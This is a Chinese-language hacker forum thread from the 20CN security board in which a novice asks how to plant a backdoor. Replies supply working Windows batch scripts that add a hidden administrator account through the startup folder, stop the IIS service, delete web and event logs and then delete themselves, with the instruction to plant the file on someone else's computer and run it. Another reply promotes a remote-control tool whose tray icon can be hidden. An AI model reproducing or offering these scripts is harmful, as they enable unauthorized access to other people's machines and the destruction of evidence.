论坛: 菜鸟乐园 标题: 如何放置一个后门呢? 复制本贴地址    
作者: jiantan [jiantan]    论坛用户   登录
如何放置一个后门呢?
都可以用什么样的方法?
软件实现的!
用手工实现的!

地主 发表时间: 11/27 19:54
回复: lijingxi [lijingxi]   见习版主   登录
net user hacker 123456 /add
net localgroup administrators hacker /add
把上面的语句保存成111.bat 并放到他的启动菜单里面
这样就可以在他每次启动计算机的时候都会加一个用户名hacker 密码123456
的超级用户,这也算是一个后门吧!呵呵!

B1层 发表时间: 11/27 21:44
回复: newmyth21 [newmyth21]   论坛用户   登录
20CN远程控制软件2.0开始测试

20CN远程控制软件2.0开始测试,相对于1.1,除了界面的美化,BUG的修复, 更重要的是增加了更加强劲的功能,已经实现类似Windows 3389远程桌面的操控方式, 操作相当便利。文件传输支持多文件下载,并能断点续传。具体情况请见 帮助文档 。
本软件的初衷是做成一个功能强大的正规的具有远程监视、操作和维护功能的软件而不是木马软件,如果您意图利用本软件进行非法目的或破坏活动,则不是我们所愿意看到的。我们不对任何这种行为承担丝毫责任,在鄙视那些将此软件做为非法用途的人的同时,我们也更鄙视那些为增加自己病毒库可杀病毒数量而将此软件列为病毒的杀毒软件厂商。在1.0版中,我们想尽办法让被控端程序不能隐藏,如在托盘显示图标等,结果依然招到查杀,既然如此,在这一版中,你可以选择不显示图标。
按此下载软件

  2003-10-30
  NetDemon




B2层 发表时间: 11/28 01:05
回复: a [tbs5201314]   论坛用户   登录
写个批处理
@echo off
net user admin$ win2k /add
net localgroup administrators admin$ /add
net user admin$ /active:yes
net stop w3svc
kill -f event log
del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
del c:\winnt\system32\config\*.event /f /q
del c:\winnt\system32dtclog\*.* /f /q
del c:\winnt\*.txt /f /q
del c:\winnt\*.log /f /q
net start w3svc
del c:\del.bat /f /q
保存为houmen.bat
种植到对方的主机里并运行




[此贴被 a(tbs5201314) 在 11月30日19时07分 编辑过]


[此贴被 a(tbs5201314) 在 12月02日17时33分 编辑过]

B3层 发表时间: 11/30 18:51
回复: jiantan [jiantan]   论坛用户   登录
虽然迟了还是要谢谢各位

B4层 发表时间: 12/01 20:53
回复: lijingxi [lijingxi]   见习版主   登录
写个批处理
@echo off
net user admin$ win2k /add
net localgroup administrators admin$ /add
net user admin$ /active:yes
net stop w3svc
kill -f event log
del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
del c:\winnt\system32\config\*.event /f /q
del c:\winnt\system32dtclog\*.* /f /q
del c:\winnt\*.txt /f /q
del c:\winnt\*.log /f /q
net stop w3svc
del c:\del.bat /f /q
保存为houmen.bat
种植到对方的主机里并运行


可以不可以解释一下这些语句是什么意思!  我只能读明白一小部分!
请高手指教!!!

B5层 发表时间: 12/01 21:18
回复: leilei [superhl]   论坛用户   登录
w3fvc是什么东西,为什么停呀

B6层 发表时间: 12/01 22:58
回复: yutou [yutou]      登录
w3fvc是日志功能。就是停了日志。

B7层 发表时间: 12/02 16:20
回复: a [tbs5201314]   论坛用户   登录
就是一个添加管理员用户和删除日志的批处理后门

B8层 发表时间: 12/02 16:56

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号